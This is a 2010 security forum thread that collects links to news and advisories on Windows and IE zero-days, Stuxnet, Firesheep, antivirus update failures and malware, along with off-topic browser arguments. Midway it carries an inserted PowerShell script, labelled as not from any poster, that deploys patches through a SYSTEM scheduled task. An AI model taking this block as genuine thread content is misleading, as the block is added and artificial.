http://yurisk.info/2010/10/31/the-d-day-for-checkpoint-utm-1-edge-appliances-happened-today-reboots-are-reported-all-over-the-world/
http://www.cpug.org/forums/check-point-utm-1-edge-appliances/14606-all-edge-firewalls-rebooted-10-30-2010-8-58-p-m.html
asyn
-
Hackers tap SCADA vuln search engine
http://www.theregister.co.uk/2010/11/02/scada_search_engine_warning/
-
Firesheep, Idiocy, Ethics and the Law
http://blog.eset.com/2010/11/02/firesheep-idiocy-ethics-and-the-law
-
Sophos debuts freebie anti-virus scanner for Macs (Sweat trickles down fanboi foreheads)
http://www.theregister.co.uk/2010/11/02/sophos_mac_anti_virus/
Sophos Anti-Virus for Mac Home Edition
http://www.sophos.com/products/free-tools/free-mac-anti-virus/tech-specs.html
Forum
http://openforum.sophos.com/t5/Sophos-Anti-Virus-for-Mac-Home/bd-p/FTT_MAC_MAGNET
Sophos unveils free antivirus software for the Mac
http://news.cnet.com/8301-27080_3-20021424-245.html
-
New multi-platform infector:
Trojan:Java/Boonana is written in Java, which gives it cross-platform capability, infecting Windows, Mac and Linux users.
http://blogs.technet.com/b/mmpc/archive/2010/11/03/its-not-koobface-new-multi-platform-infector.aspx
-
***
Using Wi-Fi? Firesheep may endanger your security
"Most internet users hear -- and dismiss -- warnings about security problems on open Wi-Fi networks. The advent of Firesheep, coupled with the booming popularity of account-based online services such as Twitter, means that no one can afford to continue to ignore online security."
http://edition.cnn.com/2010/TECH/mobile/11/01/firesheep.wifi.security/
***
Squash FireSheep with FireShepherd:
http://notendur.hi.is/~gas15/FireShepherd/
http://www.downloadsquad.com/2010/10/29/fight-firesheep-with-fireshepherd/
-
Adobe, Adobe, Adobe... ::)
http://blogs.adobe.com/psirt/2010/11/potential-issue-in-adobe-reader.html
http://lists.grok.org.uk/pipermail/full-disclosure/2010-November/077255.html
http://secunia.com/advisories/42112/
-
Attackers Now Using Honeypots to Trap Researchers
http://threatpost.com/en_us/blogs/attackers-now-using-honeypots-trap-researchers-110410?utm_source=Newsletter_110510&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=
-
Attackers Now Using Honeypots to Trap Researchers
Also read here: http://forum.avast.com/index.php?topic=63221.msg556130#msg556130
-
Attackers Now Using Honeypots to Trap Researchers
Also read here: http://forum.avast.com/index.php?topic=63221.msg556130#msg556130
Thanks, didn't know about it.
-
Attackers Now Using Honeypots to Trap Researchers
Also read here: http://forum.avast.com/index.php?topic=63221.msg556130#msg556130
I always knew that honeypots were sticky and hard to get out of. ;D
-
avast! 5 related one
http://secunia.com/advisories/42134/
-
Viruses lead security concerns of small and midsize business
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=228200171
(not sure if the report has already been posted)
-
avast! 5 related one
http://secunia.com/advisories/42134/
Well, it is rated as Not Critical and, more importantly, talks of 'malicious local users', so you have to have some responsibility over physical access to your system.
See image, click to expand.
It says this is in the avast! Internet Security product, so I don't know if "aswtdi.sys" is also across the 5.0.677 product range.
-
Microsoft warns of zero-day hole in Internet Explorer
https://www.microsoft.com/technet/security/advisory/2458511.mspx
http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks
http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspx
http://blogs.technet.com/b/srd/archive/2010/11/03/dep-emet-protect-against-attacks-on-the-latest-internet-explorer-vulnerability.aspx
http://support.microsoft.com/kb/2458511/en-us
-
Microsoft warns of zero-day hole in Internet Explorer
Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit
http://www.exploit-db.com/exploits/15421/
-
Microsoft warns of zero-day hole in Internet Explorer
Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit
http://www.exploit-db.com/exploits/15421/
Firefox is not as safe as you assume: ;)
Mozilla patches 12 Firefox bugs
http://news.techworld.com/security/3244954/mozilla-patches-12-firefox-bugs
-
Did anyone say that it was ???
I see no point in posting about a vulnerability that has been patched, when Asyn is posting about a 0day vulnerability/exploit in IE.
You really do get protective about IE when someone posts a vulnerability, strange considering that this is the SECURITY WARNINGS & Notices topic. Almost like you built it, when the whole idea of this topic is to alert about security warnings and notices wherever they might be.
-
I guess those still running on XP need to be careful. ;D
Those running Windows 7 64bit and IE9 are a bit safer and have a better browser option:
IE9, FF4 Beta In Real-World Benchmark
http://www.lucidchart.com/blog/2010/09/16/ie9-ff4-beta-in-real-world-benchmark
Google Chrome on my XP Pro system is very good. ;)
-
You are at it again; when are you going to learn? This has nothing to do with the original IE 0day post by Asyn you quoted and my follow-up.
Vista is also affected, but I guess you didn't read all of the information Asyn posted or you would have done as I did and posted the Mitigating Factors that limit the potential of this 0day exploit, rather than trying to deflect security notices on IE to other areas, as is very common for you.
I don't really care if people are using Win7 64bit (though some Win7 users are vulnerable if they aren't using IE9 beta) and/or IE9 beta, as they aren't mentioned in the 0day exploit that was posted.
-
Burma hit by massive net attack ahead of election
An ongoing computer attack has knocked Burma off the internet, just days ahead of its first election in 20 years.
http://www.bbc.co.uk/news/technology-11693214
-
Microsoft warns of zero-day hole in Internet Explorer
https://www.microsoft.com/technet/security/advisory/2458511.mspx
http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks
http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspx
http://blogs.technet.com/b/srd/archive/2010/11/03/dep-emet-protect-against-attacks-on-the-latest-internet-explorer-vulnerability.aspx
http://support.microsoft.com/kb/2458511/en-us
Heads up... 0-day in an exploit kit
http://thompson.blog.avg.com/2010/11/heads-up-0-day-in-an-exploit-kit.html
-
SSL for Hotmail blocks Windows Live connections
http://windowsteamblog.com/windows_live/b/windowslive/archive/2010/11/09/hotmail-security-improves-with-full-session-https-encryption.aspx
-
Critical Hole in Mac OS X 10.5.x
http://www.coresecurity.com/content/Apple-OSX-ATSServer-CharStrings-Sign-Mismatch
-
Hidden second Wi-Fi network with the Thomson TWG870U router
http://www.norman.com/security_center/blog/righard_zwienenberg/129786/en
-
Microsoft warns of zero-day hole in Internet Explorer
https://www.microsoft.com/technet/security/advisory/2458511.mspx
http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks
http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspx
http://blogs.technet.com/b/srd/archive/2010/11/03/dep-emet-protect-against-attacks-on-the-latest-internet-explorer-vulnerability.aspx
http://support.microsoft.com/kb/2458511/en-us
Heads up... 0-day in an exploit kit
http://thompson.blog.avg.com/2010/11/heads-up-0-day-in-an-exploit-kit.html
Amnesty International Hong Kong Website Injected With Latest Internet Explorer 0-day
http://community.websense.com/blogs/securitylabs/archive/2010/11/10/Amnesty-International-Hong-Kong-Website-Injected-With-Latest-Internet-Explorer-0_2D00_day-.aspx
-
How do criminals use Facebook? Let us count the ways
http://www.sync-blog.com/sync/2010/11/how-do-criminals-use-facebook-let-us-count-the-ways.html
-
Stuxnet: A Breakthrough
http://www.symantec.com/connect/blogs/stuxnet-breakthrough
-
Global spam e-mail drops after hacker arrests
http://www.bbc.co.uk/news/technology-11757347
-
How the TLD4 rootkit gets around driver signing policy on a 64-bit machine
http://sunbeltblog.blogspot.com/2010/11/how-tld4-rootkit-gets-around-driver.html
-
Red Hat warns of hole in OpenSSL
http://rhn.redhat.com/errata/RHSA-2010-0888.html
http://openssl.org/news/secadv_20101116.txt
-
Adobe, Adobe, Adobe... ::)
http://blogs.adobe.com/psirt/2010/11/potential-issue-in-adobe-reader.html
http://lists.grok.org.uk/pipermail/full-disclosure/2010-November/077255.html
http://secunia.com/advisories/42112/
Update for Adobe Reader fixes 19 holes
http://www.adobe.com/support/security/bulletins/apsb10-28.html
-
Adobe, Adobe, Adobe... ::)
http://blogs.adobe.com/psirt/2010/11/potential-issue-in-adobe-reader.html
http://lists.grok.org.uk/pipermail/full-disclosure/2010-November/077255.html
http://secunia.com/advisories/42112/
Update for Adobe Reader fixes 19 holes
http://www.adobe.com/support/security/bulletins/apsb10-28.html
I don't want to sidetrack this thread, but this is something that really just drives me nuts. I understand Adobe patches as soon as they can and I appreciate that, even if they take WAY too long to do so. But it's very difficult to keep all of your computers up to date and patched when it requires admin rights in order to run the update.
In the schools that I manage, I don't allow my users to have admin rights, in fact, they pretty much don't have any rights at all, they can barely even open the task manager.
So when I have to go around the school and update adobe on every computer in the lab, the student classrooms, and the teacher computers, I just curse adobe's name. Same goes for iTunes/Quicktime, same goes for shockwave (which asks for admin rights at least, so that's nice), same for Java.
I really wish they'd let standard users update the software somehow, or ask for permission when the install starts instead of just erroring out and quitting. Why can't MS integrate third-party updates in WSUS!!!
Nope, can't do that, you just have to spend $4k on shavlik or something. Ridiculous.
/rant.
-
scythe, the only thing we need, in this case, is a service installed and running or a Windows Task running with admin rights for all users.
-
scythe, the only thing we need, in this case, is a service installed and running or a Windows Task running with admin rights for all users.
And that's not going to happen, since MS won't even let standard users run Windows Updates (unless enabled through group policy). I understand their reasoning though. If it's a business environment, some IT Admins like to test the updates first before deploying them to see if they break applications.
It's frustrating, but there's no win-win situation. You either have to go around to every computer manually and update all the third-party software, or give rights to users that they shouldn't have in order for them to do it themselves.
To me, there are only two ways to fix this. Either the third parties need to allow admin creds to be entered as the update runs (so we don't have to log off the current user, log in as admin, install the update, then log off and back on as the user), OR MS needs to integrate at least common third-party software updates, so that admins can authorize them and push them out as needed.
service installed and running or a Windows Task running with admin rights for all users.
Sounds too scary, and if it were exploited, it could cause all kinds of problems. It would work though.
-
Sounds too scary, and if it were exploited, it could cause all kinds of problems. It would work though.
Life is scary :)
Google already does it. Secunia PSI does it. Some defragmentation tools do it...
avast does it (service) :)
-
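One concrete form of the "Windows Task running with admin rights" approach discussed in the last few posts, as an added example that is not code from any poster here: a scheduled task that runs as SYSTEM and applies a vendor patch silently, so the logged-on student or teacher never needs admin rights. The share name, the Adobe Reader patch file name, the local staging path and the msiexec switches are all assumptions. The security point raised above (what happens if it is exploited) comes down to file permissions: the task executes whatever is in the staging directory as SYSTEM, so that directory and the wrapper must be writable by administrators only, otherwise any standard user who can swap the file gets code execution as SYSTEM.

```powershell
# Added example, not from any poster in this thread: apply a vendor patch under
# SYSTEM from a scheduled task so standard users never need admin rights.
# Share, paths and installer switches are assumptions; built-in schtasks.exe is
# used so the same script works on XP, Vista and 7. Run this once as an admin
# on each machine (or as a GPO startup script).

$TaskName  = 'Deploy-ReaderUpdate'
$Share     = '\\fileserver\updates$'          # assumed read-only share for workstations
$PatchName = 'AdbeRdrUpd.msp'                  # assumed Adobe Reader patch file
$LocalDir  = Join-Path $env:ProgramData 'SiteUpdates'
$Wrapper   = Join-Path $LocalDir 'run-update.cmd'
$LogFile   = Join-Path $LocalDir 'reader-update.log'

# 1. Staging directory that only SYSTEM and Administrators can write to.
#    The task runs whatever is in here as SYSTEM, so if Users could modify these
#    files the task itself would be a local privilege escalation.
New-Item -ItemType Directory -Path $LocalDir -Force | Out-Null
icacls.exe $LocalDir /inheritance:r `
    /grant:r 'SYSTEM:(OI)(CI)F' 'BUILTIN\Administrators:(OI)(CI)F' 'BUILTIN\Users:(OI)(CI)RX' | Out-Null

# 2. Copy the patch locally (it inherits the restrictive ACL) so the task does
#    not depend on the share being reachable when it fires.
Copy-Item -Path (Join-Path $Share $PatchName) -Destination $LocalDir -Force
$LocalPatch = Join-Path $LocalDir $PatchName

# 3. Wrapper the task executes: silent msiexec patch install with a verbose log.
#    Keeping the command in a file avoids quoting trouble in /TR and is auditable.
@"
@echo off
msiexec.exe /p "$LocalPatch" /qn /norestart /l*v "$LogFile"
"@ | Set-Content -Path $Wrapper -Encoding ASCII

# 4. Register the task to run as SYSTEM at next boot: no stored password, and it
#    runs whether or not anyone is logged on.
schtasks.exe /Create /F /TN $TaskName /RU SYSTEM /SC ONSTART /TR $Wrapper

# 5. Verify before leaving the machine: Users must show no (W), (M) or (F) on
#    either path. If they do, the task is a privilege-escalation hole, not a fix.
icacls.exe $LocalDir
icacls.exe $Wrapper
```

The wrapper file, not the share, is what gets executed, so a compromised or mis-permissioned share only matters at copy time. On XP, which lacks icacls.exe, use cacls.exe for the same permission changes, and check the msiexec log afterwards to confirm the patch actually applied.
-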
Google Chrome tops 'Dirty Dozen' vulnerable apps list
http://www.networkworld.com/news/2010/111510-google-chrome-dirty-dozen.html?t51hb
-
Free ClamWin virus scanner moves most of Windows into quarantine
http://www.h-online.com/open/news/item/Free-ClamWin-virus-scanner-moves-most-of-Windows-into-quarantine-1139430.html
-
Free ClamWin virus scanner moves most of Windows into quarantine
http://www.h-online.com/open/news/item/Free-ClamWin-virus-scanner-moves-most-of-Windows-into-quarantine-1139430.html
Wow... What a nightmare! 25.000 files sent to Chest!
-
Wow... What a nightmare! 25.000 files sent to Chest!
Well, it sure is a nightmare...!!
We don't like that to happen with avast, do we..!!?? ;)
asyn
-
Quiet Merger, Gang Warfare, or Mere Deception?
http://blogs.mcafee.com/mcafee-labs/quiet-merger-gang-warfare-or-mere-deception
-
Whoa, Google, That’s A Pretty Big Security Hole
http://techcrunch.com/2010/11/20/whoa-google-thats-a-pretty-big-security-hole/
-
Whoa, Google, That’s A Pretty Big Security Hole
http://techcrunch.com/2010/11/20/whoa-google-thats-a-pretty-big-security-hole/
See this:
Update 4: Google says the issue is now resolved: “We quickly fixed the issue in the Google Apps Script API that could have allowed for emails to be sent to Gmail users without their permission if they visited a specially designed website while signed into their account. We immediately removed the site that demonstrated this issue, and disabled the functionality soon after. We encourage responsible disclosure of potential application security issues to security@google.com.”
-
See this
Update 4: Google says the issue is now resolved: “We quickly fixed the issue in the Google Apps Script API that could have allowed for emails to be sent to Gmail users without their permission if they visited a specially designed website while signed into their account. We immediately removed the site that demonstrated this issue, and disabled the functionality soon after. We encourage responsible disclosure of potential application security issues to security@google.com.”
I know that, Kenny... I read the content before posting it..! ;)
Still, affected users should at least know about the issue, imo...
asyn
-
Exploit for unpatched Stuxnet hole
http://www.h-online.com/security/news/item/Exploit-released-for-unpatched-Stuxnet-hole-1140196.html
-
Free ClamWin virus scanner moves most of Windows into quarantine
http://www.h-online.com/open/news/item/Free-ClamWin-virus-scanner-moves-most-of-Windows-into-quarantine-1139430.html
Wow... What a nightmare! 25.000 files sent to Chest!
That was cool.... :P
-
Avira blocks security tool and struggles with memory leak
http://www.h-online.com/security/news/item/Avira-blocks-security-tool-and-struggles-with-memory-leak-1140478.html
-
Avira blocks security tool and struggles with memory leak
http://www.h-online.com/security/news/item/Avira-blocks-security-tool-and-struggles-with-memory-leak-1140478.html
I confirm the latest update of Avira is highly buggy (Avira 10 Service Pack 1). It causes a shutdown problem in Windows XP SP3 (I've seen many people reporting that in the Avira forum, and moderators confirmed it as a known problem), a slowdown in WebGuard which slows internet speed a lot, BSODs and also an unstable firewall. I don't know what's going on behind the scenes; this is the first time Avira has released such a bad update.
Edit:
I asked Avira for a comment, These are what I got:
Michael (Avira Moderator):
There is not really a need to install the pre-sp1 version of aVir. The posted workaround solves also the problem with the memory leak.
Actually there is no information available on what the reason for this leak is or which installed programs/drivers are the reason for the leak.
Avira (In Facebook):
As you can see in the article, we commented to heise online already. A patch is in development and will be shipped soon. Affected are only a few systems, far below the promille border. The very briefly blocked Secunia PSI was corrected immediately after we received the notification.
-
Virus infecting Stony Brook computers
"Students, staff and faculty using computers on the Stony Brook University networks should be on the lookout for a virus that disguises itself as security software called ThinkPoint, according to a post on the university’s Division of Information Technology site on Monday."
http://www.sbstatesman.com/virus-attacking-stony-brook-computers786
-
Cross-Border Korean Shelling Leads to FAKEAV
News outlets all over the world are talking about the recent cross-border clash between North and South Korea. The shelling, one of the worst incidents between the two countries in years, is naturally being used by cybercriminals behind fake antivirus malware.
http://blog.trendmicro.com/cross-border-korean-shelling-leads-to-fakeav
-
Free anti-virus for Mac - 150,000 active users and plenty of malware found
http://nakedsecurity.sophos.com/2010/11/18/free-anti-virus-for-mac-150000-active-users-and-plenty-of-malware-found/
-
F-Secure Stuxnet Redux: Questions and Answers with video
http://www.f-secure.com/weblog/archives/00002066.html
-
BitDefender: 20% of Facebook news feeds contain infections
http://www.h-online.com/security/news/item/BitDefender-20-of-Facebook-news-feeds-contain-infections-1141060.html
-
Secunia got hijacked
http://secunia.com/blog/153/
http://isc.sans.edu/diary.html?storyid=9994
-
http://www.theregister.co.uk/2010/11/24/windows_0day_report/
Windows 0day allows malicious code execution
Antimalware provider Prevx has sounded the alarm about a serious vulnerability in fully patched versions of Microsoft Windows. It allows attackers to execute malware, even in versions designed to withstand such exploits.............. (read more)
Windows in trouble again ::)
XP/Vista/Win7 32 and 64 bit affected.
-
Windows 0day allows malicious code execution
Thanks, Adrian...!!!
asyn
Some related links:
http://www.prevx.com/blog/160/New-Windows-day-exploit-speaks-chinese.html
http://www.vupen.com/english/advisories/2010/3058
https://twitter.com/msftsecresponse/status/7590788200402945
-
Super Virus A Target For Cyber Terrorists
A super virus that was used to disrupt Iran's nuclear programme has been traded on the black market and could be used by terrorists, according to Sky News sources.
http://news.sky.com/skynews/Home/World-News/Stuxnet-Worm-Virus-Targeted-At-Irans-Nuclear-Plant-Is-In-Hands-Of-Bad-Guys-Sky-News-Sources-Say/Article/201011415827544?lpos=World_News_News_Your_Way_Region_5&lid=NewsYourWay_ARTICLE_15827544_Stuxnet_Worm%3A_Virus_Targeted_At_Irans_Nuclear_Plant_Is_In_Hands_Of_Bad_Guys%2C_Sky_News_Sources_Say
hmmmm...that was a short url ;D
-
hmmmm...that was a short url ;D
It sure was... ;D 8)
-
Exploit Code Out For New Windows Kernel Flaw
http://goo.gl/TVSX5 (Shortened)
http://threatpost.com/en_us/blogs/exploit-code-out-new-windows-kernel-flaw-112910
-
Exploit Code Out For New Windows Kernel Flaw
http://goo.gl/TVSX5 (Shortened)
Please do not use shortened links.
-
For those who are interested - a guide for the preview of some commonly found shortened urls
http://security.thejoshmeister.com/2009/04/how-to-preview-shortened-urls-tinyurl.html
and a warning for Facebook users
Facebook infested with new worm
http://www.zdnet.com/blog/igeneration/facebook-infested-with-new-worm-more-proof-site-is-insecure/6955?tag=nl.e550
-
Free anti-virus for Mac - 150,000 active users and plenty of malware found
http://nakedsecurity.sophos.com/2010/11/18/free-anti-virus-for-mac-150000-active-users-and-plenty-of-malware-found/
That may convince my stepmom to put an antivirus on her iMac. is the Avast! Mac version free? If not, what free Mac AVs are there?
-
That may convince my stepmom to put an antivirus on her iMac. is the Avast! Mac version free? If not, what free Mac AVs are there?
Please open a new topic for this question.
Thanks.
asyn
-
Nullsoft closes multiple Winamp vulnerabilities
http://forums.winamp.com/showthread.php?t=324322
http://forums.winamp.com/showthread.php?threadid=159785
http://www.winamp.com/media-player/en
-
Latest Koobface news ..... still alive and well
Koobface: Inside a Crimeware Network
http://www.infowar-monitor.net/2010/11/koobface/
Rogue apps 'worst Facebook feed malware baddies' ( Bonus extras will eff up your feed )
http://www.theregister.co.uk/2010/11/24/facebook_malware_survey/
-
ZeuS variant only infects super-fast PCs ( Too tricky for its own bad )
http://www.theregister.co.uk/2010/11/25/snobby_zeus_variant_avoids_bog_standard_pcs/
-
ZeuS variant only infects super-fast PCs ( Too tricky for its own bad )
http://www.theregister.co.uk/2010/11/25/snobby_zeus_variant_avoids_bog_standard_pcs/
Technical info here: http://forum.avast.com/index.php?topic=66267.msg561612#msg561612
asyn
-
Last infection here was a 'Yankee Doodle' in the late '80s.
I try to eat one of them whenever I find a store that sells them: ;D ;D
(http://www.drakescakeonline.com/images/yankee_doodle_sm.jpg)
-
Last infection here was a 'Yankee Doodle' in the late 80ies.
I try to eat one of them whenever I find a store that sells them: ;D ;D
Lol..! So you are infected with other Yankee Doodle(s)... ;D
http://www.symantec.com/security_response/writeup.jsp?docid=2000-121914-2303-99
asyn
-
Russians on the moon? Canon's image verification system cracked
http://www.h-online.com/security/news/item/Russians-on-the-moon-Canon-s-image-verification-system-cracked-1145443.html
-
Savannah software forge compromised
http://www.h-online.com/open/news/item/Savannah-software-forge-compromised-1145383.html
-
Back door in ProFTPD FTP server
http://www.h-online.com/open/news/item/Back-door-in-ProFTPD-FTP-server-1146592.html
-
Horror AVG (Free and Paid) Update Throws Win7 and other OS’s into Constant Reboot Loops – Ooops…We’re Sorry:
http://www.theregister.co.uk/2010/12/02/avg_auto_immune_update/
Comment and Temporary Fix from AVG:
http://product-team.blog.avg.com/2010/12/avg-fix-for-computers-running-on-windows-7-64-bit-platform.html?utm_medium=twitter&utm_source=twitterfeed
Edit: Just saw a new thread about this: http://forum.avast.com/index.php?topic=66897.0
-
Horror AVG (Free and Paid) Update Throws Win7 and other OS’s into Constant Reboot Loops – Ooops…We’re Sorry:
http://www.theregister.co.uk/2010/12/02/avg_auto_immune_update/
Comment and Temporary Fix from AVG:
http://product-team.blog.avg.com/2010/12/avg-fix-for-computers-running-on-windows-7-64-bit-platform.html?utm_medium=twitter&utm_source=twitterfeed
Edit: Just saw a new thread about this: http://forum.avast.com/index.php?topic=66897.0
One year after avast's nightmare...
-
Google Plugs 'High Risk' Chrome Holes, Adds PDF Viewer in Sandbox
http://threatpost.com/en_us/blogs/google-plugs-high-risk-chrome-holes-adds-pdf-viewer-sandbox-120310?utm_source=Newsletter_120310&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
Microsoft Research Develops Zozzle JavaScript Malware Detection Tool
http://threatpost.com/en_us/blogs/microsoft-research-develops-zozzle-javascript-malware-detection-tool-120210?utm_source=Newsletter_120310&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
-
Ransomware returns: 'If you ever want to see your data again...
'Revamped version of GpCode is out, yet the malware still requires victims to believe kidnappers will return stolen data for a fee
http://infoworld.com/t/malware/ransomware-returns-if-you-ever-want-see-your-data-again-449
-
New Virus: Watch Out for Goo.gl Links on Twitter
http://lifehacker.com/5708311/new-virus-watch-out-for-googl-links-on-twitter
-
OOPS - Root privileges under Linux
http://www.h-online.com/open/news/item/OOPS-Root-privileges-under-Linux-1149758.html
-
Malware "speaks" various languages
http://www.symantec.com/connect/blogs/w32yimfocab-malware-localization (http://www.symantec.com/connect/blogs/w32yimfocab-malware-localization)
-
Fake Amazon Receipt Generator Dupes Merchants
http://threatpost.com/en_us/blogs/fake-amazon-receipt-generator-dupes-merchants-120710?utm_source=Newsletter_120810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
TDL4 Rootkit Now Using Stuxnet Bug
http://threatpost.com/en_us/blogs/tdl4-rootkit-now-using-stuxnet-bug-120710?utm_source=Newsletter_120810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
Microsoft Adds Tracking Protection to IE 9
http://threatpost.com/en_us/blogs/microsoft-adds-tracking-protection-ie-9-120710?utm_source=Newsletter_120810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
-
OpenSSL Security Advisory
http://www.openssl.org/news/secadv_20101202.txt
-
Possible root vulnerability in Exim internet mailer
http://www.h-online.com/open/news/item/Possible-root-vulnerability-in-Exim-internet-mailer-1150631.html
-
‘Tis the Season of DDoS – WikiLeaks Edition. This is the most interesting article I ever read. Read here:
http://pandalabs.pandasecurity.com/tis-the-season-of-ddos-wikileaks-editio/
Currently this news is very famous over the globe. The Anonymous guys on one side fighting for freedom of information and freedom of press, and other people who consider themselves patriots who are trying to defend the greater interests of the United States. Lastly, I know I posted in the wrong topic; it should be another topic. :-[
-
Very interesting read.
It truly proves that the grass is always greener on the other side unless you
happen to step into some cow dung. ;D
-
Walgreen's acknowledges theft of customers email addresses.
(http://img.photobucket.com/albums/v190/bob3160/Walgreens.jpg)
-
Walgreen's acknowledges theft of customers email addresses.
Walgreen Co. warns customers e-mail addresses may be in spammer's hands
http://latimesblogs.latimes.com/technology/2010/12/walgreen-co-warns-customers-e-mail-addresses-may-be-in-spammers-hands.html
-
I believe I just said that without having to go to another website ;D
-
Next Tuesday Microsoft to finally fix IE vulnerability
http://www.h-online.com/security/news/item/Next-Tuesday-Microsoft-to-finally-fix-IE-vulnerability-1151069.html
-
Next Tuesday Microsoft to finally fix IE vulnerability
http://www.h-online.com/security/news/item/Next-Tuesday-Microsoft-to-finally-fix-IE-vulnerability-1151069.html
Key comment: The only known exploit is impotent where data execution prevention (DEP) is activated (as it is by default in Internet Explorer 8).
Microsoft Security Bulletin Advance Notification for December 2010
https://www.microsoft.com/technet/security/bulletin/ms10-dec.mspx
-
Finally....
Microsoft to plug critical IE, final Stuxnet Windows holes
http://news.cnet.com/8301-27080_3-20025204-245.html?tag=mncol;title
-
Next Tuesday Microsoft to finally fix IE vulnerability
http://www.h-online.com/security/news/item/Next-Tuesday-Microsoft-to-finally-fix-IE-vulnerability-1151069.html
Key comment: The only known exploit is impotent where data execution prevention (DEP) is activated (as it is by default in Internet Explorer 8).
Microsoft Security Bulletin Advance Notification for December 2010
https://www.microsoft.com/technet/security/bulletin/ms10-dec.mspx
Finally....
Microsoft to plug critical IE, final Stuxnet Windows holes
http://news.cnet.com/8301-27080_3-20025204-245.html?tag=mncol;title
I wish I could say Bull S**t! Microsoft doesn't usually keep its promise to patch those problems in IE8; better stick with Firefox or Opera for everyday browsing and only use IE8 for Windows Update patches.
-
I wish I could say Bull S**t! Microsoft doesn't usually keep its promise to patch those problems in IE8; better stick with Firefox or Opera for everyday browsing and only use IE8 for Windows Update patches.
Only those stuck on XP and don't have Windows 7 like Firefox. ;)
IE9, FF4 Beta In Real-World Benchmark
http://www.lucidchart.com/blog/2010/09/16/ie9-ff4-beta-in-real-world-benchmark
-
I wish I could say Bull S**t! Microsoft doesn't usually keep its promise to patch those problems in IE8; better stick with Firefox or Opera for everyday browsing and only use IE8 for Windows Update patches.
On modern versions of Windows, you don't need IE for Windows updates.
By the way, unless you have credible sources, saying this is a huge troll...
PS: YoKenny, I do wonder what the benchmark they used does in the link you posted...since Chrome 6 has no hardware acceleration but FF 4 Beta and IE 9 Beta do, those "real world" results seem weird.
-
<snip>
Only those stuck on XP and don't have Windows 7 like Firefox. ;)
<snip>
What a patently rubbish sweeping statement; how do you account for those win7 users that use firefox or chrome or opera? Your choice of browser is totally unrelated to the OS you are using, as it is the browser, its functions, flexibility, extensions, security, etc. that suit your use of the browser and internet that determine which browser you like best.
My preference of Firefox v IE has nothing to do with the OS being used as that preference was made many years before Vista or win7 ever came out.
By your own off the wall statement, you should be using firefox on your XP system :P
Even on XP you don't have to use IE for windows updates, you just use the inbuilt windows update, either Auto or Notify, etc.
-
<snip>
Only those stuck on XP and don't have Windows 7 like Firefox. ;)
<snip>
What a patently rubbish sweeping statement; how do you account for those win7 users that use firefox or chrome or opera? Your choice of browser is totally unrelated to the OS you are using, as it is the browser, its functions, flexibility, extensions, security, etc. that suit your use of the browser and internet that determine which browser you like best.
My preference of Firefox v IE has nothing to do with the OS being used as that preference was made many years before Vista or win7 ever came out.
By your own off the wall statement, you should be using firefox on your XP system :P
Even on XP you don't have to use IE for windows updates, you just use the inbuilt windows update, either Auto or Notify, etc.
Well said DavidR. According to my current Secunia PSI my Firefox browser is fully patched (see attachment), and there is only 1 insecure item, in IE8. YoKenny, you cannot improve your statement against XP users, as DavidR said.
-
IE9, FF4 Beta In Real-World Benchmark
As you keep posting this comment over and over again...
My question is: Do you get paid by MS..?? ;)
I don't care about the speed of my browser, I prefer flexibility/security over speed..!!!
asyn
-
As you keep posting this comment over and over again...
My question is: Do you get paid by MS..?? ;)
I don't care about the speed of my browser, I prefer flexibility/security over speed..!!!
asyn
I know some people who spam more than YoKenny does with just this one comment (which is an accurate rating), asyn!
-
IE9, FF4 Beta In Real-World Benchmark
I don't care about the speed of my browser, I prefer flexibility/security over speed..!!!
asyn
+1
-
RealNetworks, Inc. Releases Update to Address Security Vulnerabilities
http://service.real.com/realplayer/security/12102010_player/en/
-
My question is: Do you get paid by MS..?? ;)
No.
If I did I would not be stuck in this horrible Canadian climate!
Now if I was Justin Bieber I would be in Costa Rica for the Winter.
http://www.youtube.com/watch?v=_Z5-P9v3F8w
I'd miss October Fest sausage and sauerkraut though. ;D
I don't care about the speed of my browser, I prefer flexibility/security over speed..!!!
Flexibility to the point of collapse will really be a good philosophy to follow with Security as an afterthought. ;)
Arguing with DavidR is like arguing with my mother who always believed she was correct and died proving it. :o
I bet Justin Bieber uses Windows 7 and would be horrified by XP. ;)
-
I bet Justin Bieber uses Windows 7 and would be horrified by XP. ;)
I don't really care about Justin Bieber...?? ;D
Sorry guys, OT discussion is over now.
asyn
-
<snip>
Arguing with DavidR is like arguing with my mother who always believed she was correct and died proving it. :o
<snip>
There you go again, when you get your ar*e kicked when you use an off the wall sweeping statement, you can't counter the comment, so you change the subject and dive off at another tangent again.
-
<snip>
Arguing with DavidR is like arguing with my mother who always believed she was correct and died proving it. :o
<snip>
There you go again, when you get your ar*e kicked when you use an off the wall sweeping statement, you can't counter the comment, so you change the subject and dive off at another tangent again.
My mother taught me well.
-
There you go again proving my point, diving off in another direction.
I rather doubt she taught you anything, for that to happen you have to be capable of listening, something which appears to come difficult for you.
-
My mother taught me well.
Unfortunately, your trolling is sick and tasteless. Try some more, and maybe you will achieve perfection!
-
Off the topic: my mother taught me to believe in common sense, and it is very true even if it isn't YoKenny's way.
-
Possible root vulnerability in Exim internet mailer
http://www.h-online.com/open/news/item/Possible-root-vulnerability-in-Exim-internet-mailer-1150631.html
Debian and Red Hat close Exim hole
http://www.h-online.com/security/news/item/Debian-and-Red-Hat-close-Exim-hole-1151693.html
-
Gawker.com - Commenting Accounts Compromised — Change Your Passwords
http://gawker.com/5712615/commenting-accounts-compromised-%2B%2B-change-your-passwords
FAQ: http://lifehacker.com/5712785/faq-compromised-commenting-accounts-on-gawker-media
-
"HDD Plus" malware spread through major ad networks, using malvertising and drive-by download
http://blog.armorize.com/2010/12/hdd-plus-malware-spread-through.html
Major Ad Networks Found Serving Malicious Ads
